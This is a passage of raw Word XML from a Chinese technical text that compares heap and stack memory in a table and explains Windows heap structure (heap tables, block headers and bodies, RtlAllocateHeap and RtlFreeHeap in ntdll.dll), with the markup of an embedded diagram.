                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>释放方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14F32CD0"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需要把指针传给专用的释放函数，如f</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500AEFA5"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函数返回时，由系统自动回收</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="20E9F4B0" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="462AA9A8" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="361"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>管理方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DBB7A8E"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需要程序员处理申请与释放</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C598256"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申请后直接使用，申请与释放由系统自动完成，最好达到栈区平衡</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="32C58E09" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A5CB670" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="361"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>所处位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61CFD0DC"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变化范围很大</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C8C7085"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0</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>x0012XXXX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="72A5774D" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FE6C283" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="361"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>增长方向</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32C1143A"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由内存低地址向高地址增长（不考虑碎片等情况）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3431B97B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:leftChars="17" w:left="36" w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>由内存高地址向低地址增长</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50DEBA16"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 xml:space="preserve">.3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆结构与堆管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B95B43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软件开发中，一般使用new、malloc、HeapAlloc等API创建堆，使用delete、free、HeapFree等API删除堆。其中new、malloc、HeapAlloc在底层都调用了RtlAllocateHeap函数，delete、free、HeapFree在底层都调用了RtlFreeHeap函数，RtlAllocateHeap和RtlFreeHeap位于ntdll.dll中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09303E43" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD1495D"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lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8310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堆由堆表和堆块构成，堆表位于堆区的起始位置，用于索引堆区中所有堆块的重要信息，堆表分为两类：块表与空表，堆表中保存了堆区各个堆的指针；堆块分成两部分，块首和块身，块首保存这个堆块的基本信息，块身保存程序运行时的数据，程序堆区的结构如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.12</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717DB4E1"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noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpc">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E398CE2" wp14:editId="60DEA6AC">
                <wp:extent cx="4496459" cy="2520000"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="230" name="画布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文本框 2"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="607533" y="75253"/>
                            <a:ext cx="449653" cy="373099"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:solidFill>
                              <a:prstClr val="black"/>
                            </a:solidFill>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="535EE32B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>堆表</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="87984" tIns="43992" rIns="87984" bIns="43992" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="5" name="矩形 5"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2338082" y="1986112"/>
                            <a:ext cx="488446" cy="330419"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3011C6C1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>块首</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="87984" tIns="43992" rIns="87984" bIns="43992" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6" name="矩形 6"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2826527" y="1986560"/>
                            <a:ext cx="1030766" cy="329971"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="412F06CD" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                  <w:kern w:val="2"/>
                                </w:rPr>
                                <w:t>块身</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" spcFirstLastPara="0" vert="horz" wrap="square" lIns="87984" tIns="43992" rIns="87984" bIns="43992" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="8" name="矩形 8"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="119341" y="1458979"/>
                            <a:ext cx="488235" cy="329971"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4DF5F122" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                  <w:kern w:val="2"/>
                                </w:rPr>
                                <w:t>块首</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" spcFirstLastPara="0" vert="horz" wrap="square" lIns="87984" tIns="43992" rIns="87984" bIns="43992" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="10" name="矩形 10"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="608187" y="1458979"/>
                            <a:ext cx="1030242" cy="329971"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="35C8273A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>块身</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" spcFirstLastPara="0" vert="horz" wrap="square" lIns="87984" tIns="43992" rIns="87984" bIns="43992" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="12" name="矩形 12"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2784250" y="919432"/>
                            <a:ext cx="488235" cy="329971"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3CC0F9B2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>块首</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" spcFirstLastPara="0" vert="horz" wrap="square" lIns="87984" tIns="43992" rIns="87984" bIns="43992" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="16" name="矩形 16"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3273096" y="919432"/>
                            <a:ext cx="1030242" cy="329971"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="489B96D4" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>块身</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" spcFirstLastPara="0" vert="horz" wrap="square" lIns="87984" tIns="43992" rIns="87984" bIns="43992" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="17" name="连接符: 曲线 17"/>
                        <wps:cNvCnPr>
                          <a:stCxn id="2" idx="3"/>
                        </wps:cNvCnPr>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1057181" y="261769"/>
                            <a:ext cx="1727054" cy="822512"/>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连接符: 曲线 18"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="5400000">
                            <a:off x="99342" y="712738"/>
                            <a:ext cx="1010361" cy="482124"/>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连接符: 曲线 21"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="16200000" flipH="1">
                            <a:off x="1050863" y="454617"/>
                            <a:ext cx="1537657" cy="1525016"/>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E398CE2" id="画布 230" o:spid="_x0000_s1026" editas="canvas" style="width:354.05pt;height:198.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="44964,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&#10;eG1sUEsFBgAAAAAEAAQA8wAAANw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64;height:25196;visibility:visible;mso-wrap-style:square">
                  <v:fill o:detectmouseclick="t"/>
                  <v:path o:connecttype="none"/>
                </v:shape>
                <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                  <v:stroke joinstyle="miter"/>
                  <v:path gradientshapeok="t" o:connecttype="rect"/>
                </v:shapetype>
